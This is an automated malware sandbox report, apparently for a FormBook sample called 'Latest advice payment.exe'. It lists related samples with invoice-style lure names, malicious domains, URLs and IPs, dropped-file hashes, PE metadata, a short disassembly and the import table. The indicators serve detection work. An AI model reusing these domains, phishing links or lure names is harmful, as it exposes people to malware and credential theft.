                                                          • www.rgenerousrs.store/o362/
                                                          purchase Order.exeGet hashmaliciousFormBookBrowse
                                                          • www.rgenerousrs.store/o362/
                                                          Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                          • www.rgenerousrs.store/zr8v/
                                                          209.74.77.107SW_5724.exeGet hashmaliciousFormBookBrowse
                                                          • www.happyjam.life/4ii9/
                                                          quotation.exeGet hashmaliciousFormBookBrowse
                                                          • www.gadgetre.info/8q8w/
                                                          Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • www.beyondfitness.live/fbpt/
                                                          specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • www.gadgetre.info/8q8w/
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • www.learnwithus.site/alu5/
                                                          ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • www.gadgetre.info/8q8w/
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • www.learnwithus.site/alu5/
                                                          Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                          • www.beyondfitness.live/fbpt/
                                                          RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                          • www.learnwithus.site/alu5/

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          www.learnwithus.siteDocs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 209.74.77.107
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.77.107
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.77.107
                                                          RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.77.107
                                                          r0lqcud7.nbnnn.xyzDocument_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 23.225.159.42
                                                          quotation.exeGet hashmaliciousFormBookBrowse
                                                          • 27.124.4.246
                                                          YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                          • 23.225.159.42
                                                          Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 202.79.161.151
                                                          lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                          • 23.225.159.42
                                                          BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                          • 27.124.4.246
                                                          specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 23.225.159.42
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 202.79.161.151
                                                          ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 202.79.161.151
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 27.124.4.246
                                                          www.amayavp.xyzOrder MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                          • 185.27.134.144
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 185.27.134.144
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 185.27.134.144
                                                          IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 185.27.134.144
                                                          purchase Order.exeGet hashmaliciousFormBookBrowse
                                                          • 185.27.134.144
                                                          DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                          • 185.27.134.144
                                                          RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                          • 185.27.134.144
                                                          www.vayui.topZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 172.67.145.234
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.95.160
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.145.234
                                                          ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 172.67.145.234
                                                          S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 104.21.95.160
                                                          purchase Order.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.145.234
                                                          RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.145.234

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          MULTIBAND-NEWHOPEUSDocument_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 209.74.77.109
                                                          Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.79.42
                                                          SW_5724.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.77.107
                                                          72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.79.42
                                                          quotation.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.77.107
                                                          Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.77.109
                                                          Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 209.74.77.107
                                                          specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 209.74.64.187
                                                          Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.77.108
                                                          specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 209.74.77.107
                                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 172.67.165.166
                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                          • 104.21.43.156
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.82.174
                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 172.67.181.44
                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 172.67.181.192
                                                          http://flcu.phGet hashmaliciousUnknownBrowse
                                                          • 104.21.11.124
                                                          http://divisioninfo.net/Get hashmaliciousUnknownBrowse
                                                          • 1.1.1.1
                                                          https://ublypwgeo.turismoalperu.com/Get hashmaliciousCaptcha PhishBrowse
                                                          • 172.67.206.223
                                                          xd.mpsl.elfGet hashmaliciousMiraiBrowse
                                                          • 172.69.251.253
                                                          https://google.com/amp/s/fundosofia.com%2Felincrms%2Fcdmhcms%2FG%2Fcm9oYXJhQGJhcnRvbmFzc29jaWF0ZXMuY29tGet hashmaliciousCaptcha PhishBrowse
                                                          • 104.21.27.105
                                                          WILDCARD-ASWildcardUKLimitedGBquotation.exeGet hashmaliciousFormBookBrowse
                                                          • 185.27.134.206
                                                          YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                          • 185.27.134.206
                                                          Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                          • 185.27.134.206
                                                          mips.elfGet hashmaliciousMiraiBrowse
                                                          • 82.163.179.123
                                                          BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                          • 185.27.134.206
                                                          specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 185.27.134.206
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 185.27.134.144
                                                          ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 185.27.134.206
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 185.27.134.144
                                                          W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 185.27.134.206
                                                          SAIC-ASUSDocument_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 149.88.81.190
                                                          Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 149.88.81.190
                                                          sora.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 149.73.18.108
                                                          sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                          • 149.88.21.86
                                                          botx.m68k.elfGet hashmaliciousMiraiBrowse
                                                          • 149.88.69.19
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 149.88.81.190
                                                          xobftuootu.elfGet hashmaliciousUnknownBrowse
                                                          • 149.115.34.148
                                                          mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 149.112.190.216
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 149.88.81.190
                                                          la.bot.arm6.elfGet hashmaliciousUnknownBrowse
                                                          • 149.65.107.71

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Temp\aut7051.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Latest advice payment.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):289280
                                                          Entropy (8bit):7.994715280767631
                                                          Encrypted:true
                                                          SSDEEP:6144:h1iR0XA42MSqI3rBt7zjhK58tYyBBnk6ZxsryCLAj+VtkDtW+dxPK:h1iRQ/5e508tq6Zxsmpj+VtkDhPK
                                                          MD5:9C448033DA5DD5ECF1A2FAA1ADBC1568
                                                          SHA1:D4B3823B9C4C93BF477CFB0DA2A01EE768E16B3D
                                                          SHA-256:283A93AFB136D17562A4DCA5177BFD97AF2C14B455BFFD18C484FEC6529EFAB6
                                                          SHA-512:EC12DDFD3D2217097AE66493F204E14BFE63723D93F090D505FAA6BD73D87C4C3BC2C19EE9E55234295112E0FBD5D146F53036DD40A8CE89B7B2B0D57980B188
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:...H[7MG<9ON.XV.T263WWS.WHX7MG89ON6WXVHT263WWSYWHX7MG89ON6W.VHT<).YW.P.i.6...m''Ew($'3@W^w4279',./".K: .>6v..a.^836wZER.MG89ON6.Y_.iRQ.j74.j(?.W..u.Q.B...VT.M..t8P..QZ'sV0.VHT263WW..WH.6LG.O..6WXVHT26.WURRVCX7.C89ON6WXVH.&63WGSYW8\7MGx9O^6WXTHT463WWSYWNX7MG89ONFSXVJT263WWQY..X7]G8)ON6WHVHD263WWSIWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT.BV/#SYW<.3MG(9ONnSXVXT263WWSYWHX7MG.9O.6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89O

                                                          C:\Users\user\AppData\Local\Temp\lophophorine

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Latest advice payment.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):289280
                                                          Entropy (8bit):7.994715280767631
                                                          Encrypted:true
                                                          SSDEEP:6144:h1iR0XA42MSqI3rBt7zjhK58tYyBBnk6ZxsryCLAj+VtkDtW+dxPK:h1iRQ/5e508tq6Zxsmpj+VtkDhPK
                                                          MD5:9C448033DA5DD5ECF1A2FAA1ADBC1568
                                                          SHA1:D4B3823B9C4C93BF477CFB0DA2A01EE768E16B3D
                                                          SHA-256:283A93AFB136D17562A4DCA5177BFD97AF2C14B455BFFD18C484FEC6529EFAB6
                                                          SHA-512:EC12DDFD3D2217097AE66493F204E14BFE63723D93F090D505FAA6BD73D87C4C3BC2C19EE9E55234295112E0FBD5D146F53036DD40A8CE89B7B2B0D57980B188
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:...H[7MG<9ON.XV.T263WWS.WHX7MG89ON6WXVHT263WWSYWHX7MG89ON6W.VHT<).YW.P.i.6...m''Ew($'3@W^w4279',./".K: .>6v..a.^836wZER.MG89ON6.Y_.iRQ.j74.j(?.W..u.Q.B...VT.M..t8P..QZ'sV0.VHT263WW..WH.6LG.O..6WXVHT26.WURRVCX7.C89ON6WXVH.&63WGSYW8\7MGx9O^6WXTHT463WWSYWNX7MG89ONFSXVJT263WWQY..X7]G8)ON6WHVHD263WWSIWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT.BV/#SYW<.3MG(9ONnSXVXT263WWSYWHX7MG.9O.6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89O

                                                          C:\Users\user\AppData\Local\Temp\z5f52P3-

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\bitsadmin.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.198363417267728
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:Latest advice payment.exe
                                                          File size:1'216'000 bytes
                                                          MD5:b1ff44d20bc312e62d55daf8a8cf5b07
                                                          SHA1:c470001e130a55b1081ba071c47c0e1e60570453
                                                          SHA256:5b359667005091665aad2d9773ea103cbdb88c47a1a9a7b44243d83ef90b8a15
                                                          SHA512:5ae1af3a858ebdc73f5ae6423293dd5831b96a95a95354479aa8763f40dbbe059242d0b0163fbbb29202cc1eb1220007b0dbf6239e7b4faffdd29ed84afae639
                                                          SSDEEP:24576:ou6J33O0c+JY5UZ+XC0kGso6Faznc/5AZxS3+BkVrPWY:Cu0c++OCvkGs9FaznchAZxReCY
                                                          TLSH:1D45CF2273DDC361CB769173BF69B7016EBF78610630B85B2F880D7DA960162162D7A3
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                          File Icon

                                                          Icon Hash:aaf3e3e3938382a0

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x427dcd
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x674F050F [Tue Dec 3 13:18:07 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007F772885E77Ah
                                                          jmp 00007F7728851544h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push edi
                                                          push esi
                                                          mov esi, dword ptr [esp+10h]
                                                          mov ecx, dword ptr [esp+14h]
                                                          mov edi, dword ptr [esp+0Ch]
                                                          mov eax, ecx
                                                          mov edx, ecx
                                                          add eax, esi
                                                          cmp edi, esi
                                                          jbe 00007F77288516CAh
                                                          cmp edi, eax
                                                          jc 00007F7728851A2Eh
                                                          bt dword ptr [004C31FCh], 01h
                                                          jnc 00007F77288516C9h
                                                          rep movsb
                                                          jmp 00007F77288519DCh
                                                          cmp ecx, 00000080h
                                                          jc 00007F7728851894h
                                                          mov eax, edi
                                                          xor eax, esi
                                                          test eax, 0000000Fh
                                                          jne 00007F77288516D0h
                                                          bt dword ptr [004BE324h], 01h
                                                          jc 00007F7728851BA0h
                                                          bt dword ptr [004C31FCh], 00000000h
                                                          jnc 00007F772885186Dh
                                                          test edi, 00000003h
                                                          jne 00007F772885187Eh
                                                          test esi, 00000003h
                                                          jne 00007F772885185Dh
                                                          bt edi, 02h
                                                          jnc 00007F77288516CFh
                                                          mov eax, dword ptr [esi]
                                                          sub ecx, 04h
                                                          lea esi, dword ptr [esi+04h]
                                                          mov dword ptr [edi], eax
                                                          lea edi, dword ptr [edi+04h]
                                                          bt edi, 03h
                                                          jnc 00007F77288516D3h
                                                          movq xmm1, qword ptr [esi]
                                                          sub ecx, 08h
                                                          lea esi, dword ptr [esi+08h]
                                                          movq qword ptr [edi], xmm1
                                                          lea edi, dword ptr [edi+08h]
                                                          test esi, 00000007h
                                                          je 00007F7728851725h
                                                          bt esi, 03h
                                                          jnc 00007F7728851778h

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ASM] VS2013 build 21005
                                                          • [ C ] VS2013 build 21005
                                                          • [C++] VS2013 build 21005
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [ASM] VS2013 UPD4 build 31101
                                                          • [RES] VS2013 build 21005
                                                          • [LNK] VS2013 UPD4 build 31101

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x60534.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1280000x711c.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0xc70000x605340x6060075ee14026eba3fb0ff6e449640964528False0.9318483503566797data7.903322811583743IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x1280000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                          RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                          RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                          RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                          RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                          RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                          RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                          RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                          RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                          RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                          RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                          RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                          RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                          RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                          RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                          RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                          RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                          RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                          RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                          RT_RCDATA0xcf7b80x577f9data1.0003236670359075
                                                          RT_GROUP_ICON0x126fb40x76dataEnglishGreat Britain0.6610169491525424
                                                          RT_GROUP_ICON0x12702c0x14dataEnglishGreat Britain1.25
                                                          RT_GROUP_ICON0x1270400x14dataEnglishGreat Britain1.15
                                                          RT_GROUP_ICON0x1270540x14dataEnglishGreat Britain1.25
                                                          RT_VERSION0x1270680xdcdataEnglishGreat Britain0.6181818181818182
                                                          RT_MANIFEST0x1271440x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                          Imports

                                                          DLLImport
                                                          WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                          VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                          WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                          PSAPI.DLLGetProcessMemoryInfo
                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                          USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                          UxTheme.dllIsThemeActive
                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, 